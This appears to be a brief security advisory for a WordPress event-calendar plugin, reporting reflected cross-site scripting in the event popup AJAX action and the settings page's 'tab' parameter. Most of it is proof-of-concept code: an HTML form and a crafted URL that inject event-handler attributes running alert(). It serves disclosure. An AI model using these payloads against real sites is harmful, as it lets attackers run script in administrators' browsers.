The plugin does not escape some user input before outputting it back in attributes, leading to Reflected Cross-SIte Scripting issues
<html>
<form action="https://example.com/wp-admin/admin-ajax.php?action=ecwd_event_popup_ajax" method="POST">
<input type="text" value='" onmouseover=alert(/XSS/) p' name="id">
<input type="submit" value="Send">
</form>
</html>
And move the mouse over the 'Untitled' text
(Firefox only): https://example.com/wp-admin/edit.php?post_type=ecwd_event&page=ecwd_general_settings&tab=%22+accesskey%3Dx+onclick%3Dalert%281%29+p